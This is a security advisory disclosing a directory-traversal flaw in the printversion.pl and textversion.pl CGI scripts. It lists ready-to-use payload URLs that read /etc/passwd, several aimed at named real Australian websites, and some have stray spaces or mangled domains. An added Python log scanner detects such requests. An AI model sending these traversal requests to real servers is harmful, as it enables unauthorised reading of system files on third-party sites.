The printversion.pl and textversion.pl scripts do not restrict the `file` parameter to the intended directory, which allows arbitrary files on the server to be read:

http://www.xxx.com/cgi-bin/textversion/textversion.pl?conf=conf.xml&file=../../../../etc/passwd
http://www.xxx.com/cgi-bin/printversion/printversion.pl?conf=conf.xml&file=../../../etc/passwd

Examples:

http://lcnsw.labor.net.au/cgi-bin/printversion/printversion.pl? conf=conf.xml&file=../../../etc/passwd 
http://www.racismnoway.com.au/cgi-bin/printversion/ printversion.pl?conf=conf.xml&file=../../../etc/passwd 
http://www.sca.nsw.gov.au/cgi-bin/printversion/printversion.pl? conf=conf.xml&file=../../../../etc/passwd 
http://www.sca.nsw.gov.au/cgi-bin/textversion/textversion.pl? conf=conf.xml&file=../../../../etc/passwd 
http://www.nswteachers.nsw.edu.au/cgi-bin/printversion/ printversion.pl?conf=conf.xml&file=./../../../etc/passwd 
http://www.communitybuilders.nswgov.au/cgi-bin/textversion/ textversion.pl?file=../../../../etc/passwd 
http://unionsafe.labor.netau/cgi-bin/textversion/textversion.pl? conf=conf.xml&file=../../../../etc/passwd 
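For operators of sites running these scripts, the following added example (not part of the original advisory) scans web server access logs for requests to printversion.pl or textversion.pl whose `file` parameter leaves the document directory. The log format (Apache combined) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts named in the advisory; the affected parameter is `file`.
SCRIPTS = ("printversion.pl", "textversion.pl")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo leftover percent-encoding so the check sees the real path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(path_value):
    """True if the value climbs out of its directory or is an absolute path."""
    value = decode_fully(path_value).replace("\\", "/")
    if "\x00" in value or value.startswith("/"):
        return True
    return ".." in value.split("/")

def suspicious_requests(log_lines):
    """Return (line_no, decoded file value) for traversal requests to the scripts."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(SCRIPTS):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            if is_traversal(value):
                hits.append((line_no, decode_fully(value)))
    return hits

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET /cgi-bin/printversion/printversion.pl?conf=conf.xml&file=news/2005.html HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2005:10:00:05 +0000] "GET /cgi-bin/textversion/textversion.pl?conf=conf.xml&file=../../../../etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.44 - - [01/Jan/2005:10:00:09 +0000] "GET /cgi-bin/printversion/printversion.pl?conf=conf.xml&file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [01/Jan/2005:10:00:12 +0000] "GET /index.html?file=../x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: traversal in file= -> {value}")
```

A hit with a 200 status and a response size unlike normal pages is worth following up as a possible successful file read.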

durito [durito@mail.ru] LwB Security Team [lwb57.org] 
Copyright 2002-2005 by LwB Security Team. All rights reserved.


